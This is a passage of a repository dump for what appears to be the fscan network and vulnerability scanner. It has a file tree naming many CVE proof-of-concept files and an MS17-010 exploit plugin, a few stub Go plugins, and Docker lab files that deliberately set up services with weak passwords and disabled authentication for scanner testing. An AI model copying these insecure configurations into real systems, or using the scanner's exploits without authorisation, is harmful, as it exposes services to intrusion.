├── .github ├── conf │ └── .goreleaser.yml └── workflows │ └── release.yml ├── .gitignore ├── Common ├── Config.go ├── Flag.go ├── Log.go ├── Output.go ├── Parse.go ├── ParseIP.go ├── ParsePort.go ├── Ports.go ├── Proxy.go ├── Types.go └── i18n.go ├── Core ├── ICMP.go ├── LocalScanner.go ├── PluginUtils.go ├── PortFinger.go ├── PortInfo.go ├── PortScan.go ├── Registry.go ├── Scanner.go ├── ServiceScanner.go ├── WebScanner.go └── nmap-service-probes.txt ├── LICENSE.txt ├── Plugins ├── ActiveMQ.go ├── Base.go ├── Cassandra.go ├── DCInfo.go ├── DCInfoUnix.go ├── Elasticsearch.go ├── FTP.go ├── FindNet.go ├── IMAP.go ├── Kafka.go ├── LDAP.go ├── LocalInfo.go ├── MS17010-Exp.go ├── MS17010.go ├── MSSQL.go ├── Memcached.go ├── MiniDump.go ├── MiniDumpUnix.go ├── Modbus.go ├── Mongodb.go ├── MySQL.go ├── Neo4j.go ├── NetBIOS.go ├── Oracle.go ├── POP3.go ├── Postgres.go ├── RDP.go ├── RabbitMQ.go ├── Redis.go ├── Rsync.go ├── SMB.go ├── SMB2.go ├── SMTP.go ├── SNMP.go ├── SSH.go ├── SmbGhost.go ├── Telnet.go ├── VNC.go ├── WebPoc.go └── WebTitle.go ├── README.md ├── README_EN.md ├── TestDocker ├── ActiveMQ │ ├── Dockerfile │ ├── README.txt │ ├── activemq.xml │ └── users.properties ├── Cassandra │ └── README.txt ├── Elasticsearch │ ├── Dockerfile │ └── README.txt ├── FTP │ └── README.txt ├── IMAP │ ├── Dockerfile │ └── README.txt ├── Kafka │ ├── README.txt │ ├── docker-compose.yml │ └── kafka_jaas.conf ├── LDAP │ ├── Dockerfile │ ├── README.txt │ └── bootstrap.ldif ├── MSSQL │ ├── Dockerfile │ └── README.txt ├── Memcached │ ├── Dockerfile │ └── README.txt ├── Modbus │ └── README.txt ├── Mongodb │ ├── Dockerfile │ └── README.txt ├── MySQL │ ├── Dockerfile │ ├── README.txt │ └── my.cnf ├── Neo4j │ ├── Dockerfile │ └── docker-compose.yml ├── Oracle │ ├── Dockerfile │ └── README.txt ├── POP3 │ ├── Dockerfile │ └── README.txt ├── Postgre │ ├── Dockerfile │ └── README.md ├── RabbitMQ │ ├── Dockerfile │ └── README.txt ├── Redis │ ├── Dockerfile │ ├── README.txt │ └── redis.conf 
├── Rsync │ ├── Dockerfile │ └── README.txt ├── SMTP │ ├── Dockerfile │ ├── README.txt │ └── start.sh ├── SNMP │ ├── Dockerfile │ └── README.txt ├── SSH │ ├── Dockerfile │ └── README.txt ├── Telnet │ ├── Dockerfile │ └── README.md ├── Tomcat │ ├── Dockerfile │ ├── README.txt │ ├── context.xml │ └── tomcat-users.xml ├── VNC │ ├── Dockerfile │ ├── README.txt │ └── supervisord.conf ├── Weblogic │ ├── Dockerfile │ ├── README.txt │ ├── create-domain.py │ └── start.sh └── Zabbix │ └── docker-compose.yml ├── WebScan ├── InfoScan.go ├── WebScan.go ├── info │ └── Rules.go ├── lib │ ├── Check.go │ ├── Client.go │ ├── Eval.go │ ├── Shiro.go │ ├── http.pb.go │ └── http.proto └── pocs │ ├── 74cms-sqli-1.yml │ ├── 74cms-sqli-2.yml │ ├── 74cms-sqli.yml │ ├── CVE-2017-7504-Jboss-serialization-RCE.yml │ ├── CVE-2022-22947.yml │ ├── CVE-2022-22954-VMware-RCE.yml │ ├── CVE-2022-26134.yml │ ├── Hotel-Internet-Manage-RCE.yml │ ├── Struts2-062-cve-2021-31805-rce.yml │ ├── active-directory-certsrv-detect.yml │ ├── activemq-cve-2016-3088.yml │ ├── activemq-default-password.yml │ ├── airflow-unauth.yml │ ├── alibaba-canal-default-password.yml │ ├── alibaba-canal-info-leak.yml │ ├── alibaba-nacos-v1-auth-bypass.yml │ ├── alibaba-nacos.yml │ ├── amtt-hiboss-server-ping-rce.yml │ ├── apache-ambari-default-password.yml │ ├── apache-axis-webservice-detect.yml │ ├── apache-druid-cve-2021-36749.yml │ ├── apache-flink-upload-rce.yml │ ├── apache-httpd-cve-2021-40438-ssrf.yml │ ├── apache-httpd-cve-2021-41773-path-traversal.yml │ ├── apache-httpd-cve-2021-41773-rce.yml │ ├── apache-kylin-unauth-cve-2020-13937.yml │ ├── apache-nifi-api-unauthorized-access.yml │ ├── apache-ofbiz-cve-2018-8033-xxe.yml │ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml │ ├── aspcms-backend-leak.yml │ ├── backup-file.yml │ ├── bash-cve-2014-6271.yml │ ├── bt742-pma-unauthorized-access.yml │ ├── cacti-weathermap-file-write.yml │ ├── chinaunicom-modem-default-password.yml │ ├── cisco-cve-2020-3452-readfile.yml │ ├── 
citrix-cve-2019-19781-path-traversal.yml │ ├── citrix-cve-2020-8191-xss.yml │ ├── citrix-cve-2020-8193-unauthorized.yml │ ├── citrix-xenmobile-cve-2020-8209.yml │ ├── coldfusion-cve-2010-2861-lfi.yml │ ├── confluence-cve-2015-8399.yml │ ├── confluence-cve-2019-3396-lfi.yml │ ├── confluence-cve-2021-26084.yml │ ├── confluence-cve-2021-26085-arbitrary-file-read.yml │ ├── consul-rexec-rce.yml │ ├── consul-service-rce.yml │ ├── coremail-cnvd-2019-16798.yml │ ├── couchcms-cve-2018-7662.yml │ ├── couchdb-cve-2017-12635.yml │ ├── couchdb-unauth.yml │ ├── craftcms-seomatic-cve-2020-9757-rce.yml │ ├── datang-ac-default-password-cnvd-2021-04128.yml │ ├── dedecms-carbuyaction-fileinclude.yml │ ├── dedecms-cve-2018-6910.yml │ ├── dedecms-cve-2018-7700-rce.yml │ ├── dedecms-guestbook-sqli.yml │ ├── dedecms-membergroup-sqli.yml │ ├── dedecms-url-redirection.yml │ ├── discuz-ml3x-cnvd-2019-22239.yml │ ├── discuz-v72-sqli.yml │ ├── discuz-wechat-plugins-unauth.yml │ ├── discuz-wooyun-2010-080723.yml │ ├── django-CVE-2018-14574.yml │ ├── dlink-850l-info-leak.yml │ ├── dlink-cve-2019-16920-rce.yml │ ├── dlink-cve-2019-17506.yml │ ├── dlink-cve-2020-25078-account-disclosure.yml │ ├── dlink-cve-2020-9376-dump-credentials.yml │ ├── dlink-dsl-2888a-rce.yml │ ├── docker-api-unauthorized-rce.yml │ ├── docker-registry-api-unauth.yml │ ├── dotnetcms-sqli.yml │ ├── draytek-cve-2020-8515.yml │ ├── druid-monitor-unauth.yml │ ├── drupal-cve-2014-3704-sqli.yml │ ├── drupal-cve-2018-7600-rce.yml │ ├── drupal-cve-2019-6340.yml │ ├── dubbo-admin-default-password.yml │ ├── duomicms-sqli.yml │ ├── dvr-cve-2018-9995.yml │ ├── e-office-v10-sql-inject.yml │ ├── e-office-v9-upload-cnvd-2021-49104.yml │ ├── e-zkeco-cnvd-2020-57264-read-file.yml │ ├── ecology-arbitrary-file-upload.yml │ ├── ecology-filedownload-directory-traversal.yml │ ├── ecology-javabeanshell-rce.yml │ ├── ecology-springframework-directory-traversal.yml │ ├── ecology-syncuserinfo-sqli.yml │ ├── ecology-v8-sqli.yml │ ├── 
ecology-validate-sqli.yml │ ├── ecology-workflowcentertreedata-sqli.yml │ ├── ecology-workflowservicexml.yml │ ├── ecshop-cnvd-2020-58823-sqli.yml │ ├── ecshop-collection-list-sqli.yml │ ├── ecshop-login-sqli.yml │ ├── ecshop-rce.yml │ ├── eea-info-leak-cnvd-2021-10543.yml │ ├── elasticsearch-cve-2014-3120.yml │ ├── elasticsearch-cve-2015-1427.yml │ ├── elasticsearch-cve-2015-3337-lfi.yml │ ├── elasticsearch-cve-2015-5531.yml │ ├── elasticsearch-unauth.yml │ ├── etcd-unauth.yml │ ├── etcd-v3-unauth.yml │ ├── etouch-v2-sqli.yml │ ├── exchange-cve-2021-26855-ssrf.yml │ ├── eyou-rce.yml │ ├── ezoffice-dpwnloadhttp.jsp-filedownload.yml │ ├── f5-cve-2021-22986.yml │ ├── f5-cve-2022-1388.yml │ ├── f5-tmui-cve-2020-5902-rce.yml │ ├── fangweicms-sqli.yml │ ├── fckeditor-info.yml │ ├── feifeicms-lfr.yml │ ├── finecms-sqli.yml │ ├── finereport-directory-traversal.yml │ ├── finereport-v8-arbitrary-file-read.yml │ ├── flexpaper-cve-2018-11686.yml │ ├── flink-jobmanager-cve-2020-17519-lfi.yml │ ├── fortigate-cve-2018-13379-readfile.yml │ ├── frp-dashboard-unauth.yml │ ├── gateone-cve-2020-35736.yml │ ├── gilacms-cve-2020-5515.yml │ ├── gitlab-graphql-info-leak-cve-2020-26413.yml │ ├── gitlab-ssrf-cve-2021-22214.yml │ ├── gitlist-rce-cve-2018-1000533.yml │ ├── glassfish-cve-2017-1000028-lfi.yml │ ├── go-pprof-leak.yml │ ├── gocd-cve-2021-43287.yml │ ├── h2-database-web-console-unauthorized-access.yml │ ├── h3c-imc-rce.yml │ ├── h3c-secparh-any-user-login.yml │ ├── h5s-video-platform-cnvd-2020-67113-unauth.yml │ ├── hadoop-yarn-unauth.yml │ ├── hanming-video-conferencing-file-read.yml │ ├── harbor-cve-2019-16097.yml │ ├── hikvision-cve-2017-7921.yml │ ├── hikvision-gateway-data-file-read.yml │ ├── hikvision-info-leak.yml │ ├── hikvision-intercom-service-default-password.yml │ ├── hikvision-showfile-file-read.yml │ ├── hikvision-unauthenticated-rce-cve-2021-36260.yml │ ├── hjtcloud-arbitrary-fileread.yml │ ├── hjtcloud-directory-file-leak.yml │ ├── 
huawei-home-gateway-hg659-fileread.yml │ ├── ifw8-router-cve-2019-16313.yml │ ├── iis-put-getshell.yml │ ├── influxdb-unauth.yml │ ├── inspur-tscev4-cve-2020-21224-rce.yml │ ├── jboss-cve-2010-1871.yml │ ├── jboss-unauth.yml │ ├── jeewms-showordownbyurl-fileread.yml │ ├── jellyfin-file-read-cve-2021-21402.yml │ ├── jenkins-cve-2018-1000600.yml │ ├── jenkins-cve-2018-1000861-rce.yml │ ├── jenkins-unauthorized-access.yml │ ├── jetty-cve-2021-28164.yml │ ├── jira-cve-2019-11581.yml │ ├── jira-cve-2019-8442.yml │ ├── jira-cve-2019-8449.yml │ ├── jira-cve-2020-14179.yml │ ├── jira-cve-2020-14181.yml │ ├── jira-ssrf-cve-2019-8451.yml │ ├── joomla-cnvd-2019-34135-rce.yml │ ├── joomla-component-vreview-sql.yml │ ├── joomla-cve-2015-7297-sqli.yml │ ├── joomla-cve-2017-8917-sqli.yml │ ├── joomla-cve-2018-7314-sql.yml │ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml │ ├── jumpserver-unauth-rce.yml │ ├── jupyter-notebook-unauthorized-access.yml │ ├── kafka-manager-unauth.yml │ ├── kibana-cve-2018-17246.yml │ ├── kibana-unauth.yml │ ├── kingdee-eas-directory-traversal.yml │ ├── kingsoft-v8-default-password.yml │ ├── kingsoft-v8-file-read.yml │ ├── kong-cve-2020-11710-unauth.yml │ ├── kubernetes-unauth.yml │ ├── kyan-network-monitoring-account-password-leakage.yml │ ├── landray-oa-custom-jsp-fileread.yml │ ├── lanproxy-cve-2021-3019-lfi.yml │ ├── laravel-cve-2021-3129.yml │ ├── laravel-debug-info-leak.yml │ ├── laravel-improper-webdir.yml │ ├── maccms-rce.yml │ ├── maccmsv10-backdoor.yml │ ├── metinfo-cve-2019-16996-sqli.yml │ ├── metinfo-cve-2019-16997-sqli.yml │ ├── metinfo-cve-2019-17418-sqli.yml │ ├── metinfo-file-read.yml │ ├── metinfo-lfi-cnvd-2018-13393.yml │ ├── minio-default-password.yml │ ├── mongo-express-cve-2019-10758.yml │ ├── mpsec-isg1000-file-read.yml │ ├── msvod-sqli.yml │ ├── myucms-lfr.yml │ ├── nagio-cve-2018-10735.yml │ ├── nagio-cve-2018-10736.yml │ ├── nagio-cve-2018-10737.yml │ ├── nagio-cve-2018-10738.yml │ ├── natshell-arbitrary-file-read.yml │ ├── 
netentsec-icg-default-password.yml │ ├── netentsec-ngfw-rce.yml │ ├── netgear-cve-2017-5521.yml │ ├── nextjs-cve-2017-16877.yml │ ├── nexus-cve-2019-7238.yml │ ├── nexus-cve-2020-10199.yml │ ├── nexus-cve-2020-10204.yml │ ├── nexus-default-password.yml │ ├── nexusdb-cve-2020-24571-path-traversal.yml │ ├── nhttpd-cve-2019-16278.yml │ ├── node-red-dashboard-file-read-cve-2021-3223.yml │ ├── novnc-url-redirection-cve-2021-3654.yml │ ├── nps-default-password.yml │ ├── ns-asg-file-read.yml │ ├── nsfocus-uts-password-leak.yml │ ├── nuuo-file-inclusion.yml │ ├── odoo-file-read.yml │ ├── openfire-cve-2019-18394-ssrf.yml │ ├── opentsdb-cve-2020-35476-rce.yml │ ├── panabit-gateway-default-password.yml │ ├── panabit-ixcache-default-password.yml │ ├── pandorafms-cve-2019-20224-rce.yml │ ├── pbootcms-database-file-download.yml │ ├── php-cgi-cve-2012-1823.yml │ ├── phpcms-cve-2018-19127.yml │ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml │ ├── phpmyadmin-setup-deserialization.yml │ ├── phpok-sqli.yml │ ├── phpshe-sqli.yml │ ├── phpstudy-backdoor-rce.yml │ ├── phpstudy-nginx-wrong-resolve.yml │ ├── phpunit-cve-2017-9841-rce.yml │ ├── powercreator-arbitrary-file-upload.yml │ ├── prometheus-url-redirection-cve-2021-29622.yml │ ├── pulse-cve-2019-11510.yml │ ├── pyspider-unauthorized-access.yml │ ├── qibocms-sqli.yml │ ├── qilin-bastion-host-rce.yml │ ├── qizhi-fortressaircraft-unauthorized.yml │ ├── qnap-cve-2019-7192.yml │ ├── rabbitmq-default-password.yml │ ├── rails-cve-2018-3760-rce.yml │ ├── razor-cve-2018-8770.yml │ ├── rconfig-cve-2019-16663.yml │ ├── resin-cnnvd-200705-315.yml │ ├── resin-inputfile-fileread-or-ssrf.yml │ ├── resin-viewfile-fileread.yml │ ├── rockmongo-default-password.yml │ ├── ruijie-eg-cli-rce.yml │ ├── ruijie-eg-file-read.yml │ ├── ruijie-eg-info-leak.yml │ ├── ruijie-eweb-rce-cnvd-2021-09650.yml │ ├── ruijie-nbr1300g-cli-password-leak.yml │ ├── ruijie-uac-cnvd-2021-14536.yml │ ├── ruoyi-management-fileread.yml │ ├── saltstack-cve-2020-16846.yml │ ├── 
saltstack-cve-2021-25282-file-write.yml │ ├── samsung-wea453e-default-pwd.yml │ ├── samsung-wea453e-rce.yml │ ├── samsung-wlan-ap-wea453e-rce.yml │ ├── sangfor-ad-download.php-filedownload.yml │ ├── sangfor-ba-rce.yml │ ├── sangfor-edr-arbitrary-admin-login.yml │ ├── sangfor-edr-cssp-rce.yml │ ├── sangfor-edr-tool-rce.yml │ ├── satellian-cve-2020-7980-rce.yml │ ├── seacms-before-v992-rce.yml │ ├── seacms-rce.yml │ ├── seacms-sqli.yml │ ├── seacms-v654-rce.yml │ ├── seacmsv645-command-exec.yml │ ├── secnet-ac-default-password.yml │ ├── seeyon-a6-employee-info-leak.yml │ ├── seeyon-a6-test-jsp-sql.yml │ ├── seeyon-ajax-unauthorized-access.yml │ ├── seeyon-cnvd-2020-62422-readfile.yml │ ├── seeyon-oa-a8-m-information-disclosure.yml │ ├── seeyon-oa-cookie-leak.yml │ ├── seeyon-session-leak.yml │ ├── seeyon-setextno-jsp-sql.yml │ ├── seeyon-unauthoried.yml │ ├── seeyon-wooyun-2015-0108235-sqli.yml │ ├── seeyon-wooyun-2015-148227.yml │ ├── shiro-key.yml │ ├── shiziyu-cms-apicontroller-sqli.yml │ ├── shopxo-cnvd-2021-15822.yml │ ├── showdoc-default-password.yml │ ├── showdoc-uploadfile.yml │ ├── skywalking-cve-2020-9483-sqli.yml │ ├── solarwinds-cve-2020-10148.yml │ ├── solr-cve-2017-12629-xxe.yml │ ├── solr-cve-2019-0193.yml │ ├── solr-fileread.yml │ ├── solr-velocity-template-rce.yml │ ├── sonarqube-cve-2020-27986-unauth.yml │ ├── sonicwall-ssl-vpn-rce.yml │ ├── spark-api-unauth.yml │ ├── spark-webui-unauth.yml │ ├── spon-ip-intercom-ping-rce.yml │ ├── spring-actuator-heapdump-file.yml │ ├── spring-cloud-cve-2020-5405.yml │ ├── spring-cloud-cve-2020-5410.yml │ ├── spring-core-rce.yml │ ├── spring-cve-2016-4977.yml │ ├── springboot-cve-2021-21234.yml │ ├── springboot-env-unauth.yml │ ├── springcloud-cve-2019-3799.yml │ ├── sql-file.yml │ ├── struts2-045.yml │ ├── struts2-046-1.yml │ ├── supervisord-cve-2017-11610.yml │ ├── swagger-ui-unauth.yml │ ├── tamronos-iptv-rce.yml │ ├── telecom-gateway-default-password.yml │ ├── tensorboard-unauth.yml │ ├── 
terramaster-cve-2020-15568.yml │ ├── terramaster-tos-rce-cve-2020-28188.yml │ ├── thinkadmin-v6-readfile.yml │ ├── thinkcmf-lfi.yml │ ├── thinkcmf-write-shell.yml │ ├── thinkphp-v6-file-write.yml │ ├── thinkphp5-controller-rce.yml │ ├── thinkphp5023-method-rce.yml │ ├── tianqing-info-leak.yml │ ├── tomcat-cve-2017-12615-rce.yml │ ├── tomcat-cve-2018-11759.yml │ ├── tomcat-manager-weak.yml │ ├── tongda-insert-sql-inject.yml │ ├── tongda-meeting-unauthorized-access.yml │ ├── tongda-oa-v11.9-api.ali.php-upload.yml │ ├── tongda-user-session-disclosure.yml │ ├── tongda-v2017-uploadfile.yml │ ├── tpshop-directory-traversal.yml │ ├── tpshop-sqli.yml │ ├── tvt-nvms-1000-file-read-cve-2019-20085.yml │ ├── typecho-rce.yml │ ├── ueditor-cnvd-2017-20077-file-upload.yml │ ├── uwsgi-cve-2018-7490.yml │ ├── vbulletin-cve-2019-16759-bypass.yml │ ├── vbulletin-cve-2019-16759.yml │ ├── vmware-vcenter-arbitrary-file-read.yml │ ├── vmware-vcenter-cve-2021-21985-rce.yml │ ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml │ ├── vmware-vrealize-cve-2021-21975-ssrf.yml │ ├── weaver-E-Cology-getSqlData-sqli.yml │ ├── weaver-ebridge-file-read.yml │ ├── weaver-oa-eoffice-v9-upload-getshell.yml │ ├── weblogic-console-weak.yml │ ├── weblogic-cve-2017-10271.yml │ ├── weblogic-cve-2019-2725.yml │ ├── weblogic-cve-2019-2729-1.yml │ ├── weblogic-cve-2019-2729-2.yml │ ├── weblogic-cve-2020-14750.yml │ ├── weblogic-ssrf.yml │ ├── webmin-cve-2019-15107-rce.yml │ ├── weiphp-path-traversal.yml │ ├── weiphp-sql.yml │ ├── wifisky-default-password-cnvd-2021-39012.yml │ ├── wordpress-cve-2019-19985-infoleak.yml │ ├── wordpress-ext-adaptive-images-lfi.yml │ ├── wordpress-ext-mailpress-rce.yml │ ├── wuzhicms-v410-sqli.yml │ ├── xdcms-sql.yml │ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml │ ├── xunchi-cnvd-2020-23735-file-read.yml │ ├── yapi-rce.yml │ ├── yccms-rce.yml │ ├── yonyou-grp-u8-sqli-to-rce.yml │ ├── yonyou-grp-u8-sqli.yml │ ├── yonyou-nc-arbitrary-file-upload.yml │ ├── 
yonyou-nc-bsh-servlet-bshservlet-rce.yml │ ├── yonyou-u8-oa-sqli.yml │ ├── youphptube-encoder-cve-2019-5127.yml │ ├── youphptube-encoder-cve-2019-5128.yml │ ├── youphptube-encoder-cve-2019-5129.yml │ ├── yungoucms-sqli.yml │ ├── zabbix-authentication-bypass.yml │ ├── zabbix-cve-2016-10134-sqli.yml │ ├── zabbix-default-password.yml │ ├── zcms-v3-sqli.yml │ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml │ ├── zeroshell-cve-2019-12725-rce.yml │ ├── zimbra-cve-2019-9670-xxe.yml │ └── zzcms-zsmanage-sqli.yml ├── go.mod ├── go.sum ├── image ├── 1.png ├── 2.0-1.png ├── 2.0-2.png ├── 2.png ├── 2020-12-12-13-34-44.png ├── 3.png ├── 4.png ├── 5.png ├── gpt-4o │ ├── 4o-1.png │ ├── 4o-2.png │ ├── 4o-3.png │ ├── 4o-4.png │ ├── 4o-5.png │ ├── 4o-6.png │ ├── 4o-7.png │ ├── 4o-8.png │ └── final.png ├── live.png ├── netbios.png ├── netbios1.png └── sponsor.png └── main.go /.gitignore: -------------------------------------------------------------------------------- 1 | result.txt 2 | main 3 | .idea 4 | fscan.exe 5 | fscan 6 | makefile 7 | fscanapi.csv 8 | -------------------------------------------------------------------------------- /Plugins/DCInfoUnix.go: -------------------------------------------------------------------------------- 1 | //go:build !windows 2 | 3 | package Plugins 4 | 5 | import "github.com/shadow1ng/fscan/Common" 6 | 7 | func DCInfoScan(info *Common.HostInfo) (err error) { 8 | return nil 9 | } 10 | -------------------------------------------------------------------------------- /Plugins/MiniDumpUnix.go: -------------------------------------------------------------------------------- 1 | //go:build !windows 2 | 3 | package Plugins 4 | 5 | import "github.com/shadow1ng/fscan/Common" 6 | 7 | func MiniDump(info *Common.HostInfo) (err error) { 8 | return nil 9 | } 10 | -------------------------------------------------------------------------------- /Plugins/WebPoc.go: -------------------------------------------------------------------------------- 1 | package 
Plugins 2 | 3 | import ( 4 | "github.com/shadow1ng/fscan/Common" 5 | "github.com/shadow1ng/fscan/WebScan" 6 | ) 7 | 8 | // WebPoc 直接执行Web漏洞扫描 9 | func WebPoc(info *Common.HostInfo) error { 10 | if Common.DisablePocScan { 11 | return nil 12 | } 13 | WebScan.WebScan(info) 14 | return nil 15 | } 16 | -------------------------------------------------------------------------------- /TestDocker/ActiveMQ/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM rmohr/activemq:5.15.9 2 | 3 | # 复制配置文件 4 | COPY users.properties /opt/activemq/conf/users.properties 5 | COPY activemq.xml /opt/activemq/conf/activemq.xml 6 | 7 | # 暴露端口 8 | EXPOSE 61616 61613 9 | 10 | # 设置启动命令 11 | CMD ["/opt/activemq/bin/activemq", "console"] -------------------------------------------------------------------------------- /TestDocker/ActiveMQ/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t activemq-weak . 2 | docker run -d --name activemq-test -p 61616:61616 -p 8161:8161 -p 61613:61613 activemq-weak -------------------------------------------------------------------------------- /TestDocker/ActiveMQ/users.properties: -------------------------------------------------------------------------------- 1 | admin=Aa123456789 2 | test=test123 3 | root=root123 4 | system=admin123 -------------------------------------------------------------------------------- /TestDocker/Cassandra/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t cassandra-weak . 
2 | docker run -d --name cassandra-test -e CASSANDRA_AUTHENTICATOR=AllowAllAuthenticator -p 9042:9042 -p 9160:9160 cassandra:3.11 -------------------------------------------------------------------------------- /TestDocker/Elasticsearch/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM docker.elastic.co/elasticsearch/elasticsearch:7.9.3 2 | 3 | # 设置环境变量允许单节点运行 4 | ENV discovery.type=single-node 5 | 6 | # 允许任意IP访问 7 | ENV network.host=0.0.0.0 8 | 9 | # 设置弱密码 10 | ENV ELASTIC_PASSWORD=elastic123 11 | 12 | # 暴露端口 13 | EXPOSE 9200 9300 14 | 15 | # 设置默认用户名elastic和密码elastic123 16 | RUN echo 'elastic:elastic123' > /usr/share/elasticsearch/config/users 17 | 18 | # 关闭xpack安全功能,使其可以无认证访问 19 | RUN echo 'xpack.security.enabled: false' >> /usr/share/elasticsearch/config/elasticsearch.yml -------------------------------------------------------------------------------- /TestDocker/Elasticsearch/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t elastic-test . 2 | docker run -d -p 9200:9200 -p 9300:9300 elastic-test -------------------------------------------------------------------------------- /TestDocker/FTP/README.txt: -------------------------------------------------------------------------------- 1 | docker run -d -p 20:20 -p 21:21 -e FTP_USER=admin -e FTP_PASS=123456 -e PASV_ADDRESS=127.0.0.1 --name ftp bogem/ftp 2 | Mac上可能有问题 -------------------------------------------------------------------------------- /TestDocker/IMAP/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t weak-imap . 
2 | docker run -d --name imap-test -p 143:143 -p 993:993 weak-imap -------------------------------------------------------------------------------- /TestDocker/Kafka/README.txt: -------------------------------------------------------------------------------- 1 | docker-compose up -d -------------------------------------------------------------------------------- /TestDocker/Kafka/kafka_jaas.conf: -------------------------------------------------------------------------------- 1 | KafkaServer { 2 | org.apache.kafka.common.security.plain.PlainLoginModule required 3 | username="admin" 4 | password="admin123" 5 | user_admin="admin123" 6 | user_test="test123" 7 | user_kafka="kafka123"; 8 | }; -------------------------------------------------------------------------------- /TestDocker/LDAP/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM osixia/openldap:1.5.0 2 | 3 | # 环境变量设置 4 | ENV LDAP_ORGANISATION="Example Inc" 5 | ENV LDAP_DOMAIN="example.com" 6 | ENV LDAP_BASE_DN="dc=example,dc=com" 7 | # 设置一个弱密码 8 | ENV LDAP_ADMIN_PASSWORD="Aa123456789" 9 | # 允许匿名访问 10 | ENV LDAP_READONLY_USER="true" 11 | ENV LDAP_READONLY_USER_USERNAME="readonly" 12 | ENV LDAP_READONLY_USER_PASSWORD="readonly" 13 | 14 | # 暴露端口 15 | EXPOSE 389 636 16 | 17 | # 创建初始化脚本 18 | COPY bootstrap.ldif /container/service/slapd/assets/config/bootstrap/ldif/custom/ -------------------------------------------------------------------------------- /TestDocker/LDAP/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t ldap-weak . 
2 | docker run -d --name ldap-test -p 389:389 -p 636:636 ldap-weak -------------------------------------------------------------------------------- /TestDocker/LDAP/bootstrap.ldif: -------------------------------------------------------------------------------- 1 | dn: ou=users,dc=example,dc=com 2 | objectClass: organizationalUnit 3 | ou: users 4 | 5 | dn: cn=admin,ou=users,dc=example,dc=com 6 | objectClass: inetOrgPerson 7 | cn: admin 8 | sn: admin 9 | uid: admin 10 | userPassword: admin123 11 | 12 | dn: cn=test,ou=users,dc=example,dc=com 13 | objectClass: inetOrgPerson 14 | cn: test 15 | sn: test 16 | uid: test 17 | userPassword: test123 18 | 19 | dn: cn=root,ou=users,dc=example,dc=com 20 | objectClass: inetOrgPerson 21 | cn: root 22 | sn: root 23 | uid: root 24 | userPassword: root123 -------------------------------------------------------------------------------- /TestDocker/MSSQL/Dockerfile: -------------------------------------------------------------------------------- 1 | # 使用SQL Server官方镜像 2 | FROM mcr.microsoft.com/mssql/server:2022-latest 3 | 4 | # 设置环境变量 5 | ENV ACCEPT_EULA=Y 6 | ENV MSSQL_SA_PASSWORD=P@ssword123 7 | ENV MSSQL_PID=Express 8 | 9 | # 开放1433端口 10 | EXPOSE 1433 11 | 12 | # 健康检查 13 | HEALTHCHECK --interval=30s --timeout=3s \ 14 | CMD /opt/mssql-tools/bin/sqlcmd -S localhost -U sa -P P@ssword123 -Q "SELECT 1" || exit 1 -------------------------------------------------------------------------------- /TestDocker/MSSQL/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t mssql-server . 
2 | docker run -d \ 3 | -p 1433:1433 \ 4 | --name mssql-container \ 5 | mssql-server -------------------------------------------------------------------------------- /TestDocker/Memcached/Dockerfile: -------------------------------------------------------------------------------- 1 | # 使用Memcached官方镜像 2 | FROM memcached:latest 3 | 4 | # 开放11211端口 5 | EXPOSE 11211 6 | 7 | # 设置启动参数 8 | # -m 64: 分配64MB内存 9 | # -c 1024: 最大同时连接数1024 10 | # -v: 显示版本信息 11 | CMD ["memcached", "-m", "64", "-c", "1024", "-v"] -------------------------------------------------------------------------------- /TestDocker/Memcached/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t memcached-server . 2 | docker run -d \ 3 | -p 11211:11211 \ 4 | --name memcached-container \ 5 | memcached-server -------------------------------------------------------------------------------- /TestDocker/Modbus/README.txt: -------------------------------------------------------------------------------- 1 | docker run --rm -p 5020:5020 oitc/modbus-server:latest -------------------------------------------------------------------------------- /TestDocker/Mongodb/Dockerfile: -------------------------------------------------------------------------------- 1 | # 使用MongoDB官方镜像 2 | FROM mongo:latest 3 | 4 | # 设置环境变量 5 | ENV MONGO_INITDB_ROOT_USERNAME=admin 6 | ENV MONGO_INITDB_ROOT_PASSWORD=123456 7 | 8 | # 开放27017端口 9 | EXPOSE 27017 10 | 11 | # 健康检查 12 | HEALTHCHECK --interval=30s --timeout=3s \ 13 | CMD mongosh --eval 'db.runCommand("ping").ok' localhost:27017/test --quiet -------------------------------------------------------------------------------- /TestDocker/Mongodb/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t mongodb-server . 
2 | docker run -d \ 3 | -p 27017:27017 \ 4 | --name mongodb-container \ 5 | mongodb-server -------------------------------------------------------------------------------- /TestDocker/MySQL/Dockerfile: -------------------------------------------------------------------------------- 1 | # 使用MySQL官方镜像 2 | FROM mysql:latest 3 | 4 | # 设置环境变量 5 | ENV MYSQL_ROOT_PASSWORD=Password 6 | ENV MYSQL_DATABASE=mydb 7 | 8 | # 开放3306端口 9 | EXPOSE 3306 10 | 11 | # MySQL配置 12 | # 允许远程访问 13 | COPY my.cnf /etc/mysql/conf.d/my.cnf 14 | 15 | # 健康检查 16 | HEALTHCHECK --interval=30s --timeout=3s \ 17 | CMD mysql -uroot -p"${MYSQL_ROOT_PASSWORD}" -e "SELECT 1" || exit 1 -------------------------------------------------------------------------------- /TestDocker/MySQL/README.txt: -------------------------------------------------------------------------------- 1 | docker build -t mysql-server . 2 | docker run -d -p 3306:3306 --name mysql-container mysql-server -------------------------------------------------------------------------------- /TestDocker/MySQL/my.cnf: -------------------------------------------------------------------------------- 1 | [mysqld] 2 | bind-address = 0.0.0.0 -------------------------------------------------------------------------------- /TestDocker/Neo4j/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM neo4j:4.4 2 | 3 | ENV NEO4J_AUTH=neo4j/123456 4 | ENV NEO4J_dbms_security_procedures_unrestricted=apoc.* 5 | ENV NEO4J_dbms_security_auth_enabled=true 6 | 7 | 